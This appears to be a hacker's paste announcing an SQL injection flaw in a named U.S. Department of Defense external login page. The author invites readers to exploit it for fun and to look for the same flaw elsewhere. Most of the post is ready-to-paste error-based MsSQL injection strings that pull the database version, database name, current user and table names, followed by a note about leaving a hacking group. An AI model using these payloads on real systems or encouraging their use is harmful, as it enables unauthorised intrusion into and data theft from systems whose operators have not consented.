U.S Department of Defense VULNERABLE | @Zer0Pwn

1. ______ ___ _____
2. |___ / / _ \| __ \
3. / / ___ _ __| | | | |__) |_ ___ __
4. / / / _ \ '__| | | | ___/\ \ /\ / / '_ \
5. / /_| __/ | | |_| | | \ V V /| | | |
6. /_____\___|_| \___/|_| \_/\_/ |_| |_| Zer0Pwn - @Zer0Pwn
7. ###############################################
8.  
9. Hello, friends. Today, I have quite an interesting vulnerability to share. I have tested it, and it does work. So instead of exploiting it, I thought I'd let you guys have some fun messing around with it. The vulnerability lies on the good old U.S Department of Defense (dod.mil). The vulnerability is POST MsSQL injection. A lot of sites are vulnerable to this same one... So keep checking for this same kind of thing on other websites as well. Enjoy.
10.  
11. ###############################################
12.  
13. Target ==> United States Department of Defense
14. Reason ==> Thought I'd go a little more hard-core.
15. Site ==> http://www.dod.mil/
16. Vulnerability ==> POST MsSQL Injection
17. Vulnerable Area ==> https://www.jieddo.dod.mil/jcwe/intel/externallogin.asp
18.  
19. Instructions:
20.  
21. You must put an email before any of your queries, or else it won't work. For example:
22. asd@asd.com' HAVING 1=1--
23.  
24. To get the version:
25. asd@asd.com' or 1=convert(int, @@version)--
26.  
27. To get the database:
28. asd@asd.com' or 1=convert(int, db_name())--
29.  
30. To get the current user:
31. asd@asd.com' or 1=convert(int, user_name())--
32.  
33. To get tables:
34. asd@asd.com' or 1=convert(int,(select top 1 table_name from information_schema.tables))--
35.  
36.  
37. After you're done messing around, check me out on twitter: @Zer0Pwn
38.  
39. ###############################################
40.  
41. Also. I release this on my twitter, but I'm sure everyone hasn't heard it yet. Anyways. I have left @TheWikiBoat. We had some personal issues going on between us, and I eventually decided it would be best for me and for the group that I leave. So now I'm flying solo again.